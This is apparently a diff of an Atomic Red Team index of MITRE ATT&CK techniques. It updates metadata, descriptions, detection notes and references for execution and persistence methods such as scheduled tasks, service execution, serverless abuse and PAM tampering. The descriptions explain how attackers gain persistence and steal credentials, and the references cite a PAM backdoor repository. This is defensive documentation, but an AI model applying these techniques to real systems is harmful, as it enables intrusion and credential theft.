+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -55908,7 +56286,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests:
     - name: Execute shell script via python's command mode arguement
@@ -56101,23 +56478,7 @@ execution:
         name: sh
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -56128,32 +56489,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -56196,7 +56569,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests:
     - name: Create and Execute Batch Script
@@ -56375,7 +56747,7 @@ execution:
         elevation_required: true
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -56432,11 +56804,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -56501,9 +56872,8 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests:
     - name: Visual Basic script execution to gather local computer information
@@ -56611,7 +56981,7 @@ execution:
         name: powershell
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -56632,14 +57002,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -56648,16 +57023,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -56683,6 +57060,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -56697,29 +57082,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -56732,25 +57098,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -56800,9 +57182,8 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests:
     - name: Execute a Command as a Service
@@ -57065,10 +57446,10 @@ execution:
         elevation_required: true
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -57131,7 +57512,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -57165,8 +57546,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -57175,6 +57556,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -57187,7 +57572,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At.exe Scheduled task
@@ -57253,23 +57637,24 @@ execution:
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -57316,7 +57701,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -57348,8 +57733,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -57363,6 +57748,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -57375,11 +57764,14 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests:
     - name: Scheduled Task Startup Script
@@ -57758,7 +58150,7 @@ persistence:
           schtasks /Delete /TN "#{task_name}" /F
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -57821,7 +58213,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -57886,49 +58277,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -57943,20 +58295,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests:
     - name: Malicious PAM rule
@@ -58168,7 +58557,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -58256,7 +58644,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests:
     - name: Append malicious start-process cmdlet
@@ -58379,11 +58766,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58461,7 +58847,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests:
     - name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -58540,7 +58925,7 @@ persistence:
